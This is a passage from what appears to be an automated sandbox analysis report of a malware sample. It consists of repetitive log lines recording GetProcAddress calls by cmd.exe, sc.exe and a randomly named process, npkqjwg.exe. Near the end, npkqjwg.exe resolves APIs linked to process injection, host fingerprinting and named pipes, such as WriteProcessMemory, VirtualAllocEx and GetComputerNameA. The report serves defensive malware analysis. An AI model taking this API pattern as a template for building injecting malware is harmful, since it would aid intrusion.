called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004296)\n \"cmd.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004296)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00000348)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00000348)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005132)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001952)\n \"sc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001952)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetCharABCWidthsI (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSEnableIME (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmWINNLSGetEnableStatus (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSendIMEMessageExA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmIMPGetIMEA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmIMPQueryIMEA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmIMPSetIMEA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmAssociateContext (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmEscapeA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmEscapeW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionStringW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionWindow (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmGetContext (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmGetDefaultIMEWnd (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmIsIME (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmReleaseContext (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmRegisterClient (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmGetCompositionFontA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionFontA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionWindow (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmNotifyIME (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmLockIMC (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmUnlockIMC (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmLoadIME (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSetOpenStatus (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmFreeLayout (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmActivateLayout (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmGetCandidateWindow (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSetCandidateWindow (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmConfigureIMEW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmGetConversionStatus (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSetConversionStatus (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSetStatusWindowPos (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmGetImeInfoEx (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmLockImeDpi (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmUnlockImeDpi (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmGetOpenStatus (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSetActiveContext (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmTranslateMessage (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmLoadLayout (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmProcessKey (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmPutImeMenuItemsIntoMappedFile (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmGetProperty (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSetCompositionStringW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmEnumInputContext (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ImmSystemHandler (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CtfImmTIMActivate (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CtfImmRestoreToolbarWnd (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CtfImmHideToolbarWnd (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CtfImmDispatchDefImeMessage (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CtfImmNotify (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CtfImmSetDefaultRemoteKeyboardLayout (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CtfImmGetCompatibleKeyboardLayout (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter LpkTabbedTextOut (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter LpkPSMTextOut (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter LpkDrawTextEx (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00001776)\n \"npkqjwg.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 